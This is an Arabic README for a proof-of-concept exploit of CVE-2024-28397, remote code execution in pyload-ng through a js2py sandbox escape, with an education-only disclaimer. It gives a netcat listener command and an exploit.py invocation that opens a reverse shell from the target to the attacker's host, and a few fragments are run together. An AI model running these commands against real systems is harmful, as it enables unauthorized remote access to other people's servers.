
استغلال PoC للثغرة CVE-2024-28397 – تنفيذ تعليمات برمجية عن بُعد في pyload-ng عبر هروب من بيئة js2py المعزولة (sandbox escape)
يحتوي هذا المستودع على استغلال إثبات المفهوم (PoC) لثغرة CVE-2024-28397، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد تؤثر على pyload-ng بسبب الاستخدام غير الآمن لمكتبة js2py.
إخلاء مسؤولية:
هذا الاستغلال لأغراض تعليمية وبحثية فقط.
لا تستخدمه على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.
المؤلف غير مسؤول عن أي إساءة استخدام لهذا الكود.
js2py في pyload-ngستحتاج إلى Python 3.x ومكتبة requests وnetcat لالتقاط الصدفة العكسية.
/run_codenc -lvnp 4444
python3 exploit.py -url http://target.com -lhost YOUR_IP -lport 4444 -user attacker -passwd attacker123